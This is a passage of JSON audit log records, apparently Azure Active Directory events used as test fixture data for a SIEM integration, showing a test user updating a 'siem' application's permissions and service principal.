"[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:47.4999796Z"}, {"Name": "env_epoch", "Value": "FYE60"}, {"Name": "env_seqNum", "Value": "51372052"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR568"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove app role assignment from service principal.", "Id": "115f72b6-e8e6-4710-98e9-63ccd20bf2ec"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:52", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem"}], "ObjectId": "Not Available", "ModifiedProperties": [{"Name": "RequiredResourceAccess", "OldValue": "[\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  },\r\n  {\r\n    \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      },\r\n      {\r\n        \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]", "NewValue": "[\r\n  {\r\n    \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  },\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "RequiredResourceAccess"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "5345f95e-44e0-48fc-823c-8206ff821338"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:52.5873254Z"}, {"Name": "env_epoch", "Value": "FQXLK"}, {"Name": "env_seqNum", "Value": "42492828"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##957dae7d-5f0a-4e82-a428-61c0dba2878b_00000000-0000-0000-0000-000000000000_957dae7d-5f0a-4e82-a428-61c0dba2878b"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR565"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": "fe115c66-3e08-4ab4-8a00-84ae25a59078"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:52", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem"}], "ObjectId": "Not Available", "ModifiedProperties": [{"NewValue": "[\r\n  {\r\n    \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  },\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]", "OldValue": "[\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  },\r\n  {\r\n    \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      },\r\n      {\r\n        \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]", "Name": "RequiredResourceAccess"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "RequiredResourceAccess"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "5345f95e-44e0-48fc-823c-8206ff821338"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:52.5873254Z"}, {"Name": "env_epoch", "Value": "FQXLK"}, {"Name": "env_seqNum", "Value": "42492828"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##957dae7d-5f0a-4e82-a428-61c0dba2878b_00000000-0000-0000-0000-000000000000_957dae7d-5f0a-4e82-a428-61c0dba2878b"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR565"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": "fe115c66-3e08-4ab4-8a00-84ae25a59078"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:52", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem"}, {"Type": 2, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Type": 4, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ObjectId": "71a0194b-b70c-44a6-82f2-d4670aee4585", "ModifiedProperties": [{"Name": "Included Updated Properties", "OldValue": "", "NewValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "5345f95e-44e0-48fc-823c-8206ff821338"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:52.6473040Z"}, {"Name": "env_epoch", "Value": "FQXLK"}, {"Name": "env_seqNum", "Value": "42492835"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##957dae7d-5f0a-4e82-a428-61c0dba2878b_00000000-0000-0000-0000-000000000000_957dae7d-5f0a-4e82-a428-61c0dba2878b"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR565"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update service principal.", "Id": "76f9b173-c35c-4dbb-b5f7-64750ae994ce"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:25:54", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem"}], "ObjectId": "Not Available", "ModifiedProperties": [{"Name": "RequiredResourceAccess", "OldValue": "[\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  },\r\n  {\r\n    \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]", "NewValue": "[\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  },\r\n  {\r\n    \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"594c1fb6-4f81-4475-ae41-0c394909246c\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      },\r\n      {\r\n        \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      },\r\n      {\r\n        \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "RequiredResourceAccess"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "51e48c97-80b1-42bb-b732-8b578dfac528"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:25:54.7174137Z"}, {"Name": "env_epoch", "Value": "73AB6"}, {"Name": "env_seqNum", "Value": "43793182"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR575"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": "d6ad8dba-dd88-499e-a1e1-e649bf8eeb71"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:25:54", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem"}], "ObjectId": "Not Available", "ModifiedProperties": [{"Name": "RequiredResourceAccess", "OldValue": "[\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  },\r\n  {\r\n    \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]", "NewValue": "[\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  },\r\n  {\r\n    \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"594c1fb6-4f81-4475-ae41-0c394909246c\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      },\r\n      {\r\n        \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      },\r\n      {\r\n        \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]"}, {"NewValue": "RequiredResourceAccess", "OldValue": "", "Name": "Included Updated Properties"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "51e48c97-80b1-42bb-b732-8b578dfac528"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:25:54.7174137Z"}, {"Name": "env_epoch", "Value": "73AB6"}, {"Name": "env_seqNum", "Value": "43793182"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", 